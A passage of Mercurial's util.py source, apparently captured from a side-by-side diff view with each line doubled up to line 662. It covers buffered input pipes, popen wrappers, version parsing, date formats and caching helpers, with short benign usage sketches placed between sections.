257 self._size = size
258 self._got = 0
258 self._got = 0
259 self._digests = dict(digests)
259 self._digests = dict(digests)
260 self._digester = digester(self._digests.keys())
260 self._digester = digester(self._digests.keys())
261
261
262 def read(self, length=-1):
262 def read(self, length=-1):
263 content = self._fh.read(length)
263 content = self._fh.read(length)
264 self._digester.update(content)
264 self._digester.update(content)
265 self._got += len(content)
265 self._got += len(content)
266 return content
266 return content
267
267
268 def validate(self):
268 def validate(self):
269 if self._size != self._got:
269 if self._size != self._got:
270 raise Abort(_('size mismatch: expected %d, got %d') %
270 raise Abort(_('size mismatch: expected %d, got %d') %
271 (self._size, self._got))
271 (self._size, self._got))
272 for k, v in self._digests.items():
272 for k, v in self._digests.items():
273 if v != self._digester[k]:
273 if v != self._digester[k]:
274 # i18n: first parameter is a digest name
274 # i18n: first parameter is a digest name
275 raise Abort(_('%s mismatch: expected %s, got %s') %
275 raise Abort(_('%s mismatch: expected %s, got %s') %
276 (k, v, self._digester[k]))
276 (k, v, self._digester[k]))
277
277
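# Usage sketch for digestchecker: wrap a file handle, read it to the end,
# then validate() checks both the byte count and every expected digest.
# io.BytesIO stands in for a real transfer stream.
import hashlib, io

payload = b'some payload'
expected = {'sha1': hashlib.sha1(payload).hexdigest()}
checker = digestchecker(io.BytesIO(payload), len(payload), expected)
while checker.read(4):
    pass
checker.validate()          # raises Abort on a size or digest mismatch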
278 try:
278 try:
279 buffer = buffer
279 buffer = buffer
280 except NameError:
280 except NameError:
281 if not pycompat.ispy3:
281 if not pycompat.ispy3:
282 def buffer(sliceable, offset=0, length=None):
282 def buffer(sliceable, offset=0, length=None):
283 if length is not None:
283 if length is not None:
284 return sliceable[offset:offset + length]
284 return sliceable[offset:offset + length]
285 return sliceable[offset:]
285 return sliceable[offset:]
286 else:
286 else:
287 def buffer(sliceable, offset=0, length=None):
287 def buffer(sliceable, offset=0, length=None):
288 if length is not None:
288 if length is not None:
289 return memoryview(sliceable)[offset:offset + length]
289 return memoryview(sliceable)[offset:offset + length]
290 return memoryview(sliceable)[offset:]
290 return memoryview(sliceable)[offset:]
291
291
292 closefds = pycompat.osname == 'posix'
292 closefds = pycompat.osname == 'posix'
293
293
294 _chunksize = 4096
294 _chunksize = 4096
295
295
296 class bufferedinputpipe(object):
296 class bufferedinputpipe(object):
297 """a manually buffered input pipe
297 """a manually buffered input pipe
298
298
299 Python will not let us use buffered IO and lazy reading with 'polling' at
299 Python will not let us use buffered IO and lazy reading with 'polling' at
300 the same time. We cannot probe the buffer state and select will not detect
300 the same time. We cannot probe the buffer state and select will not detect
301 that data are ready to read if they are already buffered.
301 that data are ready to read if they are already buffered.
302
302
303 This class lets us work around that by implementing its own buffering
303 This class lets us work around that by implementing its own buffering
304 (allowing efficient readline) while offering a way to know if the buffer is
304 (allowing efficient readline) while offering a way to know if the buffer is
305 empty from the output (allowing collaboration of the buffer with polling).
305 empty from the output (allowing collaboration of the buffer with polling).
306
306
307 This class lives in the 'util' module because it makes use of the 'os'
307 This class lives in the 'util' module because it makes use of the 'os'
308 module from the python stdlib.
308 module from the python stdlib.
309 """
309 """
310
310
311 def __init__(self, input):
311 def __init__(self, input):
312 self._input = input
312 self._input = input
313 self._buffer = []
313 self._buffer = []
314 self._eof = False
314 self._eof = False
315 self._lenbuf = 0
315 self._lenbuf = 0
316
316
317 @property
317 @property
318 def hasbuffer(self):
318 def hasbuffer(self):
319 """True is any data is currently buffered
319 """True is any data is currently buffered
320
320
321 This will be used externally a pre-step for polling IO. If there is
321 This will be used externally a pre-step for polling IO. If there is
322 already data then no polling should be set in place."""
322 already data then no polling should be set in place."""
323 return bool(self._buffer)
323 return bool(self._buffer)
324
324
325 @property
325 @property
326 def closed(self):
326 def closed(self):
327 return self._input.closed
327 return self._input.closed
328
328
329 def fileno(self):
329 def fileno(self):
330 return self._input.fileno()
330 return self._input.fileno()
331
331
332 def close(self):
332 def close(self):
333 return self._input.close()
333 return self._input.close()
334
334
335 def read(self, size):
335 def read(self, size):
336 while (not self._eof) and (self._lenbuf < size):
336 while (not self._eof) and (self._lenbuf < size):
337 self._fillbuffer()
337 self._fillbuffer()
338 return self._frombuffer(size)
338 return self._frombuffer(size)
339
339
340 def readline(self, *args, **kwargs):
340 def readline(self, *args, **kwargs):
341 if 1 < len(self._buffer):
341 if 1 < len(self._buffer):
342 # this should not happen because both read and readline end with a
342 # this should not happen because both read and readline end with a
343 # _frombuffer call that collapses it.
343 # _frombuffer call that collapses it.
344 self._buffer = [''.join(self._buffer)]
344 self._buffer = [''.join(self._buffer)]
345 self._lenbuf = len(self._buffer[0])
345 self._lenbuf = len(self._buffer[0])
346 lfi = -1
346 lfi = -1
347 if self._buffer:
347 if self._buffer:
348 lfi = self._buffer[-1].find('\n')
348 lfi = self._buffer[-1].find('\n')
349 while (not self._eof) and lfi < 0:
349 while (not self._eof) and lfi < 0:
350 self._fillbuffer()
350 self._fillbuffer()
351 if self._buffer:
351 if self._buffer:
352 lfi = self._buffer[-1].find('\n')
352 lfi = self._buffer[-1].find('\n')
353 size = lfi + 1
353 size = lfi + 1
354 if lfi < 0: # end of file
354 if lfi < 0: # end of file
355 size = self._lenbuf
355 size = self._lenbuf
356 elif 1 < len(self._buffer):
356 elif 1 < len(self._buffer):
357 # we need to take previous chunks into account
357 # we need to take previous chunks into account
358 size += self._lenbuf - len(self._buffer[-1])
358 size += self._lenbuf - len(self._buffer[-1])
359 return self._frombuffer(size)
359 return self._frombuffer(size)
360
360
361 def _frombuffer(self, size):
361 def _frombuffer(self, size):
362 """return at most 'size' data from the buffer
362 """return at most 'size' data from the buffer
363
363
364 The data are removed from the buffer."""
364 The data are removed from the buffer."""
365 if size == 0 or not self._buffer:
365 if size == 0 or not self._buffer:
366 return ''
366 return ''
367 buf = self._buffer[0]
367 buf = self._buffer[0]
368 if 1 < len(self._buffer):
368 if 1 < len(self._buffer):
369 buf = ''.join(self._buffer)
369 buf = ''.join(self._buffer)
370
370
371 data = buf[:size]
371 data = buf[:size]
372 buf = buf[len(data):]
372 buf = buf[len(data):]
373 if buf:
373 if buf:
374 self._buffer = [buf]
374 self._buffer = [buf]
375 self._lenbuf = len(buf)
375 self._lenbuf = len(buf)
376 else:
376 else:
377 self._buffer = []
377 self._buffer = []
378 self._lenbuf = 0
378 self._lenbuf = 0
379 return data
379 return data
380
380
381 def _fillbuffer(self):
381 def _fillbuffer(self):
382 """read data to the buffer"""
382 """read data to the buffer"""
383 data = os.read(self._input.fileno(), _chunksize)
383 data = os.read(self._input.fileno(), _chunksize)
384 if not data:
384 if not data:
385 self._eof = True
385 self._eof = True
386 else:
386 else:
387 self._lenbuf += len(data)
387 self._lenbuf += len(data)
388 self._buffer.append(data)
388 self._buffer.append(data)
389
389
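# Why hasbuffer matters: once data has been pulled into the Python-level
# buffer, select() on the underlying fd reports nothing to read, so callers
# must consult the buffer before polling.  A small POSIX-only demonstration
# on a raw pipe (not using the class itself):
import os, select

rfd, wfd = os.pipe()
os.write(wfd, b'line one\nline t')        # note: second line incomplete
buffered = os.read(rfd, 4096)             # emulate one _fillbuffer() call
ready = select.select([rfd], [], [], 0)[0]
print(bool(buffered), ready)              # True [] - data only in our buffer
os.close(rfd)
os.close(wfd)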
390 def popen2(cmd, env=None, newlines=False):
390 def popen2(cmd, env=None, newlines=False):
391 # Setting bufsize to -1 lets the system decide the buffer size.
391 # Setting bufsize to -1 lets the system decide the buffer size.
392 # The default for bufsize is 0, meaning unbuffered. This leads to
392 # The default for bufsize is 0, meaning unbuffered. This leads to
393 # poor performance on Mac OS X: http://bugs.python.org/issue4194
393 # poor performance on Mac OS X: http://bugs.python.org/issue4194
394 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
394 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
395 close_fds=closefds,
395 close_fds=closefds,
396 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
396 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
397 universal_newlines=newlines,
397 universal_newlines=newlines,
398 env=env)
398 env=env)
399 return p.stdin, p.stdout
399 return p.stdin, p.stdout
400
400
401 def popen3(cmd, env=None, newlines=False):
401 def popen3(cmd, env=None, newlines=False):
402 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
402 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
403 return stdin, stdout, stderr
403 return stdin, stdout, stderr
404
404
405 def popen4(cmd, env=None, newlines=False, bufsize=-1):
405 def popen4(cmd, env=None, newlines=False, bufsize=-1):
406 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
406 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
407 close_fds=closefds,
407 close_fds=closefds,
408 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
408 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
409 stderr=subprocess.PIPE,
409 stderr=subprocess.PIPE,
410 universal_newlines=newlines,
410 universal_newlines=newlines,
411 env=env)
411 env=env)
412 return p.stdin, p.stdout, p.stderr, p
412 return p.stdin, p.stdout, p.stderr, p
413
413
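# Usage sketch for popen2 (assumes a POSIX 'cat'; substitute another filter
# command on Windows): write to the child's stdin, close it to signal EOF,
# then collect its stdout.
stdin, stdout = popen2('cat')
stdin.write(b'ping\n')
stdin.close()
print(stdout.read())        # the echoed line, 'ping\n'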
414 def version():
414 def version():
415 """Return version information if available."""
415 """Return version information if available."""
416 try:
416 try:
417 from . import __version__
417 from . import __version__
418 return __version__.version
418 return __version__.version
419 except ImportError:
419 except ImportError:
420 return 'unknown'
420 return 'unknown'
421
421
422 def versiontuple(v=None, n=4):
422 def versiontuple(v=None, n=4):
423 """Parses a Mercurial version string into an N-tuple.
423 """Parses a Mercurial version string into an N-tuple.
424
424
425 The version string to be parsed is specified with the ``v`` argument.
425 The version string to be parsed is specified with the ``v`` argument.
426 If it isn't defined, the current Mercurial version string will be parsed.
426 If it isn't defined, the current Mercurial version string will be parsed.
427
427
428 ``n`` can be 2, 3, or 4. Here is how some version strings map to
428 ``n`` can be 2, 3, or 4. Here is how some version strings map to
429 returned values:
429 returned values:
430
430
431 >>> v = '3.6.1+190-df9b73d2d444'
431 >>> v = '3.6.1+190-df9b73d2d444'
432 >>> versiontuple(v, 2)
432 >>> versiontuple(v, 2)
433 (3, 6)
433 (3, 6)
434 >>> versiontuple(v, 3)
434 >>> versiontuple(v, 3)
435 (3, 6, 1)
435 (3, 6, 1)
436 >>> versiontuple(v, 4)
436 >>> versiontuple(v, 4)
437 (3, 6, 1, '190-df9b73d2d444')
437 (3, 6, 1, '190-df9b73d2d444')
438
438
439 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
439 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
440 (3, 6, 1, '190-df9b73d2d444+20151118')
440 (3, 6, 1, '190-df9b73d2d444+20151118')
441
441
442 >>> v = '3.6'
442 >>> v = '3.6'
443 >>> versiontuple(v, 2)
443 >>> versiontuple(v, 2)
444 (3, 6)
444 (3, 6)
445 >>> versiontuple(v, 3)
445 >>> versiontuple(v, 3)
446 (3, 6, None)
446 (3, 6, None)
447 >>> versiontuple(v, 4)
447 >>> versiontuple(v, 4)
448 (3, 6, None, None)
448 (3, 6, None, None)
449
449
450 >>> v = '3.9-rc'
450 >>> v = '3.9-rc'
451 >>> versiontuple(v, 2)
451 >>> versiontuple(v, 2)
452 (3, 9)
452 (3, 9)
453 >>> versiontuple(v, 3)
453 >>> versiontuple(v, 3)
454 (3, 9, None)
454 (3, 9, None)
455 >>> versiontuple(v, 4)
455 >>> versiontuple(v, 4)
456 (3, 9, None, 'rc')
456 (3, 9, None, 'rc')
457
457
458 >>> v = '3.9-rc+2-02a8fea4289b'
458 >>> v = '3.9-rc+2-02a8fea4289b'
459 >>> versiontuple(v, 2)
459 >>> versiontuple(v, 2)
460 (3, 9)
460 (3, 9)
461 >>> versiontuple(v, 3)
461 >>> versiontuple(v, 3)
462 (3, 9, None)
462 (3, 9, None)
463 >>> versiontuple(v, 4)
463 >>> versiontuple(v, 4)
464 (3, 9, None, 'rc+2-02a8fea4289b')
464 (3, 9, None, 'rc+2-02a8fea4289b')
465 """
465 """
466 if not v:
466 if not v:
467 v = version()
467 v = version()
468 parts = remod.split('[\+-]', v, 1)
468 parts = remod.split('[\+-]', v, 1)
469 if len(parts) == 1:
469 if len(parts) == 1:
470 vparts, extra = parts[0], None
470 vparts, extra = parts[0], None
471 else:
471 else:
472 vparts, extra = parts
472 vparts, extra = parts
473
473
474 vints = []
474 vints = []
475 for i in vparts.split('.'):
475 for i in vparts.split('.'):
476 try:
476 try:
477 vints.append(int(i))
477 vints.append(int(i))
478 except ValueError:
478 except ValueError:
479 break
479 break
480 # (3, 6) -> (3, 6, None)
480 # (3, 6) -> (3, 6, None)
481 while len(vints) < 3:
481 while len(vints) < 3:
482 vints.append(None)
482 vints.append(None)
483
483
484 if n == 2:
484 if n == 2:
485 return (vints[0], vints[1])
485 return (vints[0], vints[1])
486 if n == 3:
486 if n == 3:
487 return (vints[0], vints[1], vints[2])
487 return (vints[0], vints[1], vints[2])
488 if n == 4:
488 if n == 4:
489 return (vints[0], vints[1], vints[2], extra)
489 return (vints[0], vints[1], vints[2], extra)
490
490
491 # used by parsedate
491 # used by parsedate
492 defaultdateformats = (
492 defaultdateformats = (
493 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
493 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
494 '%Y-%m-%dT%H:%M', # without seconds
494 '%Y-%m-%dT%H:%M', # without seconds
495 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
495 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
496 '%Y-%m-%dT%H%M', # without seconds
496 '%Y-%m-%dT%H%M', # without seconds
497 '%Y-%m-%d %H:%M:%S', # our common legal variant
497 '%Y-%m-%d %H:%M:%S', # our common legal variant
498 '%Y-%m-%d %H:%M', # without seconds
498 '%Y-%m-%d %H:%M', # without seconds
499 '%Y-%m-%d %H%M%S', # without :
499 '%Y-%m-%d %H%M%S', # without :
500 '%Y-%m-%d %H%M', # without seconds
500 '%Y-%m-%d %H%M', # without seconds
501 '%Y-%m-%d %I:%M:%S%p',
501 '%Y-%m-%d %I:%M:%S%p',
502 '%Y-%m-%d %H:%M',
502 '%Y-%m-%d %H:%M',
503 '%Y-%m-%d %I:%M%p',
503 '%Y-%m-%d %I:%M%p',
504 '%Y-%m-%d',
504 '%Y-%m-%d',
505 '%m-%d',
505 '%m-%d',
506 '%m/%d',
506 '%m/%d',
507 '%m/%d/%y',
507 '%m/%d/%y',
508 '%m/%d/%Y',
508 '%m/%d/%Y',
509 '%a %b %d %H:%M:%S %Y',
509 '%a %b %d %H:%M:%S %Y',
510 '%a %b %d %I:%M:%S%p %Y',
510 '%a %b %d %I:%M:%S%p %Y',
511 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
511 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
512 '%b %d %H:%M:%S %Y',
512 '%b %d %H:%M:%S %Y',
513 '%b %d %I:%M:%S%p %Y',
513 '%b %d %I:%M:%S%p %Y',
514 '%b %d %H:%M:%S',
514 '%b %d %H:%M:%S',
515 '%b %d %I:%M:%S%p',
515 '%b %d %I:%M:%S%p',
516 '%b %d %H:%M',
516 '%b %d %H:%M',
517 '%b %d %I:%M%p',
517 '%b %d %I:%M%p',
518 '%b %d %Y',
518 '%b %d %Y',
519 '%b %d',
519 '%b %d',
520 '%H:%M:%S',
520 '%H:%M:%S',
521 '%I:%M:%S%p',
521 '%I:%M:%S%p',
522 '%H:%M',
522 '%H:%M',
523 '%I:%M%p',
523 '%I:%M%p',
524 )
524 )
525
525
526 extendeddateformats = defaultdateformats + (
526 extendeddateformats = defaultdateformats + (
527 "%Y",
527 "%Y",
528 "%Y-%m",
528 "%Y-%m",
529 "%b",
529 "%b",
530 "%b %Y",
530 "%b %Y",
531 )
531 )
532
532
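# A minimal sketch of how a parsedate-style caller can walk these tables:
# try each format in order and keep the first one strptime accepts.  The
# helper name is invented; hg's real parsedate lives later in this module.
import calendar, time

def trydateformats(datestr, formats):
    for fmt in formats:
        try:
            when = time.strptime(datestr, fmt)
        except ValueError:
            continue
        return calendar.timegm(when), fmt
    raise ValueError('invalid date: %r' % datestr)

print(trydateformats('2017-08-04 12:30', defaultdateformats))
# -> (1501849800, '%Y-%m-%d %H:%M')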
533 def cachefunc(func):
533 def cachefunc(func):
534 '''cache the result of function calls'''
534 '''cache the result of function calls'''
535 # XXX doesn't handle keyword args
535 # XXX doesn't handle keyword args
536 if func.__code__.co_argcount == 0:
536 if func.__code__.co_argcount == 0:
537 cache = []
537 cache = []
538 def f():
538 def f():
539 if len(cache) == 0:
539 if len(cache) == 0:
540 cache.append(func())
540 cache.append(func())
541 return cache[0]
541 return cache[0]
542 return f
542 return f
543 cache = {}
543 cache = {}
544 if func.__code__.co_argcount == 1:
544 if func.__code__.co_argcount == 1:
545 # we gain a small amount of time because
545 # we gain a small amount of time because
546 # we don't need to pack/unpack the list
546 # we don't need to pack/unpack the list
547 def f(arg):
547 def f(arg):
548 if arg not in cache:
548 if arg not in cache:
549 cache[arg] = func(arg)
549 cache[arg] = func(arg)
550 return cache[arg]
550 return cache[arg]
551 else:
551 else:
552 def f(*args):
552 def f(*args):
553 if args not in cache:
553 if args not in cache:
554 cache[args] = func(*args)
554 cache[args] = func(*args)
555 return cache[args]
555 return cache[args]
556
556
557 return f
557 return f
558
558
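# Usage sketch for cachefunc: the wrapped function runs once per distinct
# argument tuple (keyword arguments are unsupported, per the XXX above).
calls = []
def square(x):
    calls.append(x)
    return x * x

square = cachefunc(square)
print(square(4), square(4), square(5))   # 16 16 25
print(calls)                             # [4, 5] - second square(4) was cached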
559 class sortdict(dict):
559 class sortdict(dict):
560 '''a simple insertion-order-preserving dictionary'''
560 '''a simple insertion-order-preserving dictionary'''
561 def __init__(self, data=None):
561 def __init__(self, data=None):
562 self._list = []
562 self._list = []
563 if data:
563 if data:
564 self.update(data)
564 self.update(data)
565 def copy(self):
565 def copy(self):
566 return sortdict(self)
566 return sortdict(self)
567 def __setitem__(self, key, val):
567 def __setitem__(self, key, val):
568 if key in self:
568 if key in self:
569 self._list.remove(key)
569 self._list.remove(key)
570 self._list.append(key)
570 self._list.append(key)
571 dict.__setitem__(self, key, val)
571 dict.__setitem__(self, key, val)
572 def __iter__(self):
572 def __iter__(self):
573 return self._list.__iter__()
573 return self._list.__iter__()
574 def update(self, src):
574 def update(self, src):
575 if isinstance(src, dict):
575 if isinstance(src, dict):
576 src = src.iteritems()
576 src = src.iteritems()
577 for k, v in src:
577 for k, v in src:
578 self[k] = v
578 self[k] = v
579 def clear(self):
579 def clear(self):
580 dict.clear(self)
580 dict.clear(self)
581 self._list = []
581 self._list = []
582 def items(self):
582 def items(self):
583 return [(k, self[k]) for k in self._list]
583 return [(k, self[k]) for k in self._list]
584 def __delitem__(self, key):
584 def __delitem__(self, key):
585 dict.__delitem__(self, key)
585 dict.__delitem__(self, key)
586 self._list.remove(key)
586 self._list.remove(key)
587 def pop(self, key, *args, **kwargs):
587 def pop(self, key, *args, **kwargs):
588 try:
588 try:
589 self._list.remove(key)
589 self._list.remove(key)
590 except ValueError:
590 except ValueError:
591 pass
591 pass
592 return dict.pop(self, key, *args, **kwargs)
592 return dict.pop(self, key, *args, **kwargs)
593 def keys(self):
593 def keys(self):
594 return self._list[:]
594 return self._list[:]
595 def iterkeys(self):
595 def iterkeys(self):
596 return self._list.__iter__()
596 return self._list.__iter__()
597 def iteritems(self):
597 def iteritems(self):
598 for k in self._list:
598 for k in self._list:
599 yield k, self[k]
599 yield k, self[k]
600 def insert(self, index, key, val):
600 def insert(self, index, key, val):
601 self._list.insert(index, key)
601 self._list.insert(index, key)
602 dict.__setitem__(self, key, val)
602 dict.__setitem__(self, key, val)
603 def __repr__(self):
603 def __repr__(self):
604 if not self:
604 if not self:
605 return '%s()' % self.__class__.__name__
605 return '%s()' % self.__class__.__name__
606 return '%s(%r)' % (self.__class__.__name__, self.items())
606 return '%s(%r)' % (self.__class__.__name__, self.items())
607
607
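# Usage sketch for sortdict: iteration follows insertion order, and
# re-assigning an existing key moves it to the end (see __setitem__ above).
d = sortdict()
d['a'] = 1
d['b'] = 2
d['a'] = 3              # re-insert: 'a' now comes after 'b'
print(d.keys())         # ['b', 'a']
print(d.items())        # [('b', 2), ('a', 3)]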
608 class _lrucachenode(object):
608 class _lrucachenode(object):
609 """A node in a doubly linked list.
609 """A node in a doubly linked list.
610
610
611 Holds a reference to nodes on either side as well as a key-value
611 Holds a reference to nodes on either side as well as a key-value
612 pair for the dictionary entry.
612 pair for the dictionary entry.
613 """
613 """
614 __slots__ = (u'next', u'prev', u'key', u'value')
614 __slots__ = (u'next', u'prev', u'key', u'value')
615
615
616 def __init__(self):
616 def __init__(self):
617 self.next = None
617 self.next = None
618 self.prev = None
618 self.prev = None
619
619
620 self.key = _notset
620 self.key = _notset
621 self.value = None
621 self.value = None
622
622
623 def markempty(self):
623 def markempty(self):
624 """Mark the node as emptied."""
624 """Mark the node as emptied."""
625 self.key = _notset
625 self.key = _notset
626
626
627 class lrucachedict(object):
627 class lrucachedict(object):
628 """Dict that caches most recent accesses and sets.
628 """Dict that caches most recent accesses and sets.
629
629
630 The dict consists of an actual backing dict - indexed by original
630 The dict consists of an actual backing dict - indexed by original
631 key - and a doubly linked circular list defining the order of entries in
631 key - and a doubly linked circular list defining the order of entries in
632 the cache.
632 the cache.
633
633
634 The head node is the newest entry in the cache. If the cache is full,
634 The head node is the newest entry in the cache. If the cache is full,
635 we recycle head.prev and make it the new head. Cache accesses result in
635 we recycle head.prev and make it the new head. Cache accesses result in
636 the node being moved to before the existing head and being marked as the
636 the node being moved to before the existing head and being marked as the
637 new head node.
637 new head node.
638 """
638 """
639 def __init__(self, max):
639 def __init__(self, max):
640 self._cache = {}
640 self._cache = {}
641
641
642 self._head = head = _lrucachenode()
642 self._head = head = _lrucachenode()
643 head.prev = head
643 head.prev = head
644 head.next = head
644 head.next = head
645 self._size = 1
645 self._size = 1
646 self._capacity = max
646 self._capacity = max
647
647
648 def __len__(self):
648 def __len__(self):
649 return len(self._cache)
649 return len(self._cache)
650
650
651 def __contains__(self, k):
651 def __contains__(self, k):
652 return k in self._cache
652 return k in self._cache
653
653
654 def __iter__(self):
654 def __iter__(self):
655 # We don't have to iterate in cache order, but why not.
655 # We don't have to iterate in cache order, but why not.
656 n = self._head
656 n = self._head
657 for i in range(len(self._cache)):
657 for i in range(len(self._cache)):
658 yield n.key
658 yield n.key
659 n = n.next
659 n = n.next
660
660
661 def __getitem__(self, k):
661 def __getitem__(self, k):
662 node = self._cache[k]
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

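# Illustrative usage sketch for lrucachedict (not part of the original
# module; the capacity and keys are arbitrary example values):
#
#   d = lrucachedict(2)
#   d['a'] = 1
#   d['b'] = 2
#   d['a']        # touching 'a' makes 'b' the oldest entry
#   d['c'] = 3    # at capacity: 'b' is evicted, 'a' and 'c' remain
#   d.get('b')    # -> None
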
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

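# Illustrative usage sketch for lrucachefunc (not part of the original
# module; 'expensive' is a hypothetical callable):
#
#   @lrucachefunc
#   def expensive(n):
#       return n * n
#
#   expensive(4)  # computed and cached
#   expensive(4)  # served from the cache; only ~20 results are kept
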
class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

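# Illustrative usage sketch for propertycache (not part of the original
# module). After the first access the computed value is stored in the
# instance __dict__, shadowing the descriptor, so func runs only once:
#
#   class repo(object):
#       @propertycache
#       def branchmap(self):
#           return computebranchmap()   # hypothetical expensive call
#
#   r = repo()
#   r.branchmap   # computed, then cached on the instance
#   r.branchmap   # plain attribute lookup; no recomputation
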
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                         stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    pout, perr = p.communicate(s)
    return pout

def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass

filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
}

def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    for name, fn in filtertable.iteritems():
        if cmd.startswith(name):
            return fn(s, cmd[len(name):].lstrip())
    return pipefilter(s, cmd)

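# Illustrative usage sketch for filter() (not part of the original
# module; the shell commands are example values). The 'tempfile:' and
# 'pipe:' prefixes select the strategy from filtertable; a bare
# command defaults to pipefilter:
#
#   filter('some text\n', 'pipe: tr a-z A-Z')
#   filter('some text\n', 'tempfile: sort INFILE > OUTFILE')
#   filter('some text\n', 'wc -c')   # no prefix -> pipefilter
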
def binary(s):
    """return true if a string is binary data"""
    return bool(s and '\0' in s)

def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

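# Illustrative usage sketch for increasingchunks (not part of the
# original module): feeding many small chunks yields progressively
# larger ones, which keeps per-chunk overhead low for big streams.
#
#   pieces = ('x' * 512 for _ in range(64))
#   sizes = [len(c) for c in increasingchunks(pieces)]
#   # sizes grow roughly 1024, 2048, 4096, ... doubling toward the
#   # 65536 cap, with whatever is left over emitted at the end
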
Abort = error.Abort

def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

